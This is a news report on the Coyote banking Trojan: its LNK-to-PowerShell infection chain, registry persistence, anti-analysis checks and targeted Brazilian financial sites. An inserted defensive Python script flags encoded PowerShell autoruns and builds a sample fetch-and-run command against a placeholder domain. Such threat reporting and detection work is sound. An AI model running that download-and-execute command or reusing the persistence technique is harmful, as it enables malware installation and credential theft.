A sinister banking malware identified as Coyote has emerged as a formidable cyber threat, with its latest incursion primarily targeting Windows users in Brazil.
“Once activated, the Coyote Banking Trojan exhibits a diverse arsenal of malicious capabilities, including keystroke logging, surreptitious screen capture, and the deployment of deceptive overlays designed to pilfer sensitive credentials,” explained Cara Lin, a cybersecurity researcher at Fortinet FortiGuard Labs, in a recent analysis.
Evolution of the Attack Vector
Over the last month, cybersecurity analysts have uncovered multiple Windows Shortcut (LNK) file variants embedded with PowerShell commands, which serve as conduits for delivering the insidious malware.
Initially dissected by Kaspersky in early 2024, Coyote was observed orchestrating incursions against users in South America, demonstrating its adeptness at exfiltrating confidential data from over 70 financial applications.
In its prior attack methodology, a Squirrel installer executable acted as the catalyst, initiating a Node.js-based application—crafted via Electron—which subsequently invoked a Nim-constructed loader to unleash the malicious Coyote payload.
However, in its latest iteration, the infection process pivots to an LNK file that executes a PowerShell command, facilitating the retrieval of a secondary-stage payload from a remote server (“tbet.geontrigame[.]com”). This, in turn, triggers another PowerShell script, which activates an intermediary loader, responsible for executing an encoded payload.
Technical Modus Operandi
“The injected code utilizes Donut, a sophisticated framework engineered to decrypt and execute Microsoft Intermediate Language (MSIL) payloads,” Lin detailed. “Upon decryption, the MSIL binary establishes persistent system presence by modifying registry keys within 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'.”
Once the malware detects an existing registry entry, it eradicates it and replaces it with a newly generated entry under a randomized moniker. This newly embedded registry key is programmed to execute a Base64-encoded PowerShell command, which orchestrates the retrieval and execution of the primary Coyote banking Trojan.
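The persistence mechanism described above (a Run-key value with a randomized name that launches Base64-encoded PowerShell) is something a defender can check for directly. The following is an added example, not code from the article or from Fortinet's analysis: it classifies (value name, command) pairs as they would be exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Run, decodes any -EncodedCommand argument (Base64 over UTF-16LE, which is how PowerShell expects it), and flags entries that start PowerShell with an encoded script. The sample entries, the script they encode, and the domain example.invalid are constructed for illustration and are not Coyote indicators.

```python
"""Flag autorun entries that launch Base64-encoded PowerShell.

Added example; not code from the original article or from Fortinet's analysis.
Input is a list of (value name, command) pairs as exported from
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. Sample entries below
are constructed for illustration and are not real indicators.
"""
import base64
import re
import shlex

# Matches the last path component of a PowerShell host binary.
PS_EXE = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$", re.IGNORECASE)

# Keywords whose presence in a decoded script point at download-and-execute.
DOWNLOAD_EXEC_HINTS = ("downloadstring", "invoke-webrequest", "invoke-expression", "iex")


def is_encoded_switch(token: str) -> bool:
    """True for -EncodedCommand and the abbreviations powershell.exe accepts.

    powershell.exe resolves an unambiguous prefix of a parameter name, and in
    practice -e, -ec and -enc all select -EncodedCommand.
    """
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return bool(name) and "encodedcommand".startswith(name)


def decode_encoded_command(blob: str):
    """Decode an -EncodedCommand argument: Base64 wrapping UTF-16LE text.

    Returns None when the argument is not valid Base64 / UTF-16LE.
    """
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_run_entry(name: str, command: str) -> dict:
    """Classify one Run-key value: does it launch PowerShell, with what script?"""
    try:
        # posix=False keeps Windows backslashes literal and groups quoted paths.
        tokens = [t.strip('"') for t in shlex.split(command, posix=False)]
    except ValueError:
        tokens = command.split()
    launches_ps = bool(tokens) and bool(PS_EXE.search(tokens[0]))
    decoded = None
    # Look for an encoded-command switch that still has an argument after it.
    for i, tok in enumerate(tokens[1:-1], start=1):
        if is_encoded_switch(tok):
            decoded = decode_encoded_command(tokens[i + 1])
            break
    lowered = (decoded or "").lower()
    hints = [h for h in DOWNLOAD_EXEC_HINTS if h in lowered]
    return {
        "name": name,
        "launches_powershell": launches_ps,
        "encoded_command": decoded is not None,
        "decoded": decoded,
        "download_exec_hints": hints,
        # An autorun that starts PowerShell with an encoded script is worth a
        # look on its own; decoded download/execute keywords make it urgent.
        "suspicious": launches_ps and decoded is not None,
    }


def scan_run_entries(entries):
    """Return the names of the entries flagged as suspicious, in input order."""
    results = (inspect_run_entry(n, c) for n, c in entries)
    return [r["name"] for r in results if r["suspicious"]]


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample script standing in for the stage-2 retrieval the article
# describes; example.invalid is a reserved, non-resolving domain.
_SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"

# Constructed sample export: one ordinary autorun, one randomized-name entry.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("kx8f2qz7", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -e "
                 + encode_command(_SAMPLE_SCRIPT)),
]

if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print(inspect_run_entry(*entry))
    print("flagged:", scan_run_entries(SAMPLE_ENTRIES))
```

On a live host the same pairs can be produced with `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` or the equivalent registry read in a PowerShell or EDR collection script, and the flagged entries' decoded scripts are what an analyst reviews first. The check deliberately decodes rather than pattern-matching the Base64 blob, because the blob itself changes with every re-encoding while the decoded retrieval logic does not.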
Stealth, Evasion, and Data Exfiltration
Upon successful infiltration, Coyote undertakes a meticulous reconnaissance process—cataloging system specifications and identifying installed antivirus solutions. The harvested data is Base64-encoded and stealthily transmitted to a remote command-and-control (C2) server.
In parallel, the malware deploys advanced anti-analysis mechanisms, actively scrutinizing its execution environment to sidestep detection by sandboxing technologies and virtual machine environments.
Widened Scope of Targeted Entities
One of the most alarming enhancements in this latest Coyote campaign is the malware’s expanded list of targets, now encompassing 1,030 domains and 73 financial institutions. Among these are notable entities such as:
- mercadobitcoin.com.br
- bitcointrade.com.br
- foxbit.com.br
- augustoshotel.com.br
- blumenhotelboutique.com.br
- fallshotel.com.br
If a victim attempts to access any of these pre-defined websites, the malware initiates server-side communication with an attacker-controlled infrastructure, determining the appropriate course of action. Depending on the adversary’s directive, this could entail screenshot capture, overlay injection, keystroke logging, or manipulative display alterations.
Conclusion: A Grave Financial Cybersecurity Threat
“The infection chain behind Coyote is intricate, comprising multiple stages to ensure obfuscation and persistence,” Lin remarked. “The latest attack wave leverages an LNK file as the primary infiltration vector, which ultimately reveals a complex matrix of additional malicious artifacts. This Trojan remains a serious menace to financial cybersecurity, particularly given its ability to scale its operations beyond its initial sphere of influence.”
Cybersecurity professionals emphasize the urgent necessity of implementing proactive defense mechanisms, including behavior-based anomaly detection, stringent endpoint security policies, and continuous network monitoring, to thwart Coyote’s relentless expansion.